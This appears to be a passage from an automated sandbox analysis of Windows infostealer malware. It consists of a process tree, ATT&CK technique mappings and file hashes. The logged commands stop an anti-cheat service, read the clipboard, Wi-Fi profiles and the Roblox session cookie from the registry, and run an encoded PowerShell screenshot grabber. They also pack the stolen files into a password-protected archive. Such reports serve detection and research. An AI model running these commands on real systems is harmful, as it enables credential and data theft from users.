- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\sc.exesc delete FairplayKD6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop FairplayKD1 >nul5⤵
- System Location Discovery: System Language Discovery
PID:4000 -
C:\Windows\SysWOW64\sc.exesc stop FairplayKD16⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete FairplayKD1 >nul5⤵
- System Location Discovery: System Language Discovery
PID:3884 -
C:\Windows\SysWOW64\sc.exesc delete FairplayKD16⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2444
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:472 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4008
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4456
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2908 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1976
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c54ixdql\c54ixdql.cmdline"5⤵PID:4892
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESACCA.tmp" "c:\Users\Admin\AppData\Local\Temp\c54ixdql\CSC70C53055226D4EBF9E5F766B27A3747.TMP"6⤵PID:1512
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:820
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4332
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4304
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:936
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1788
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:2664
-
C:\Windows\system32\getmac.exegetmac4⤵PID:3452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:4200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24002\rar.exe a -r -hp"tadyleak" "C:\Users\Admin\AppData\Local\Temp\CGXLP.zip" *"3⤵PID:2940
-
C:\Users\Admin\AppData\Local\Temp\_MEI24002\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI24002\rar.exe a -r -hp"tadyleak" "C:\Users\Admin\AppData\Local\Temp\CGXLP.zip" *4⤵
- Executes dropped EXE
PID:4948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:3972
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:3716
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3316
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:1188
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
PID:4520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4456
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:4008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵PID:2004
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1408
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD51e5a8b0b3a77e5341e49b8d561b15071
SHA1adae921de44e54ae70f3efd7e7d1b3cb64a0fa91
SHA2564e8440afb8d5e0b93eb84058da7414529ad479456f1e9efad2f9152fd8fc5958
SHA51227460facc63380398b4df11b699a1f0392c69f5b94e81f2a375512bf123b963d368ce3887d26372094b76b584129c6e7ac7e9a3450a4cf94cca6ad1a5cea2c10
-
Filesize
4B
MD5d3b07384d113edec49eaa6238ad5ff00
SHA1f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA5120cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6
-
Filesize
1KB
MD57dfd24c172c72c006519ae34d76c733e
SHA18bd916a8296a5d00325f6d43d8ca09df818432c1
SHA25637411ddb847ec0a8a5220cc51ce6cd330047e8bd85d9601465f5b1b38ddce91b
SHA5122a6525244600d0015a230f83ee37b0b1255d2aeafc1ccb006ff062797347b376e6dddc99938bf5b2ba691fa48fdca66f79a4e929b07dd9854dfc83be3ea0574a
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
1KB
MD53aceaa150f701255b7197a29a8653e3b
SHA1aae9677918db938c779f81fede3c2a4ae3e0bffb
SHA256a9fefd91fc2c03d365ebade8c8f595e746f5ba13330008f075b120731b16c7f2
SHA512a12bea88173f95225020b916f962bf6fe1d8cb1b5696a3393de6a7eafbc03796aa02a396f5b09a3c31e67e2989945d33b25c2ffab8569e07a814956e6eb17907
-
Filesize
191B
MD51daa9166821448d7e0c2073181a3fefc
SHA1331f74738f91cde4ac2b1ace9be9dfc1f622ac8a
SHA256b918113c81df336f763889e4fd25c518db0d6dff97ab11413a99b1050671e803
SHA512f3a71beac2af7f7a5cfedcc737edf138522ab249bf1cba5e9e9ea08c8c202569a68f18fcd73f856bf1271bf47ea41fcd5dc4e246c2dbddcaa4ad27b56ec3d0a7
-
Filesize
4B
MD520879c987e2f9a916e578386d499f629
SHA1c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA2569f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f
-
Filesize
1KB
MD562a983d7b649df3871c5147132701825
SHA1217cd0dcb1d1f512622ffcaef066a4ea87eee0a7
SHA256389a274f111df734f94f56c3a5fb2efa8c1d238ef2172ae94803466134c9dc5b
SHA5123b2caae4b55eb5d83a755a55002d60036f09acae52b18a32949b92303cf444e6f8d5047205651ec2ccd8615230546f091d6676b8ce436b750f2663ebf0fec52d
-
Filesize
15KB
MD556b2c3810dba2e939a8bb9fa36d3cf96
SHA199ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA2564354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA51227812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e
-
Filesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
Filesize
48KB
MD520a7ecfe1e59721e53aebeb441a05932
SHA1a91c81b0394d32470e9beff43b4faa4aacd42573
SHA2567ebbe24da78b652a1b6fe77b955507b1daff6af7ff7e5c3fa5ac71190bde3da8
SHA51299e5d877d34ebaaaeb281c86af3fff9d54333bd0617f1366e3b4822d33e23586ef9b11f4f7dd7e1e4a314c7a881f33123735294fe8af3a136cd10f80a9b8d902
-
Filesize
58KB
MD55006b7ea33fce9f7800fecc4eb837a41
SHA1f6366ba281b2f46e9e84506029a6bdf7948e60eb
SHA2568f7a5b0abc319ba9bfd11581f002e533fcbe4ca96cedd37656b579cd3942ef81
SHA512e3e5e8f471a8ca0d5f0091e00056bd53c27105a946ca936da3f5897b9d802167149710404386c2ed3399b237b8da24b1a24e2561c436ed2e031a8f0564fbbc7c
-
Filesize
106KB
MD5d0231f126902db68d7f6ca1652b222c0
SHA170e79674d0084c106e246474c4fb112e9c5578eb
SHA25669876f825678b717c51b7e7e480de19499d972cb1e98bbfd307e53ee5bace351
SHA512b6b6bfd5fde200a9f45aeb7f6f845eac916feeef2e3fca54e4652e1f19d66ae9817f1625ce0ed79d62e504377011ce23fd95a407fbdbaa6911a09e48b5ef4179
-
Filesize
35KB
MD5a81e0df35ded42e8909597f64865e2b3
SHA16b1d3a3cd48e94f752dd354791848707676ca84d
SHA2565582f82f7656d4d92ed22f8e460bebd722e04c8f993c3a6adcc8437264981185
SHA5122cda7348faffabc826fb7c4eddc120675730077540f042d6dc8f5e6921cf2b9cb88afcd114f53290aa20df832e3b7a767432ea292f6e5b5b5b7d0e05cf8905a6
-
Filesize
85KB
MD5f8b61629e42adfe417cb39cdbdf832bb
SHA1e7f59134b2bf387a5fd5faa6d36393cbcbd24f61
SHA2567a3973fedd5d4f60887cf0665bcb7bd3c648ad40d3ae7a8e249d875395e5e320
SHA51258d2882a05289b9d17949884bf50c8f4480a6e6d2b8bd48dfdbcb03d5009af64abf7e9967357aeebf95575d7ef434a40e8ad07a2c1fe275d1a87aa59dcc702d6
-
Filesize
25KB
MD50da22ccb73cd146fcdf3c61ef279b921
SHA1333547f05e351a1378dafa46f4b7c10cbebe3554
SHA256e8ae2c5d37a68bd34054678ae092e2878f73a0f41e6787210f1e9b9bb97f37a0
SHA5129eece79511163eb7c36a937f3f2f83703195fc752b63400552ca03d0d78078875ff41116ebaeb05c48e58e82b01254a328572096a17aaad818d32f3d2d07f436
-
Filesize
43KB
MD5c12bded48873b3098c7a36eb06b34870
SHA1c32a57bc2fc8031417632500aa9b1c01c3866ade
SHA2566c4860cb071bb6d0b899f7ca2a1da796b06ea391bac99a01f192e856725e88aa
SHA512335510d6f2f13fb2476a5a17445ca6820c86f7a8a8650f4fd855dd098d022a16c80a8131e04212fd724957d8785ad51ccaff532f2532224ccfd6ce44f4e740f9
-
Filesize
56KB
MD563618d0bc7b07aecc487a76eb3a94af8
SHA153d528ef2ecbe8817d10c7df53ae798d0981943a
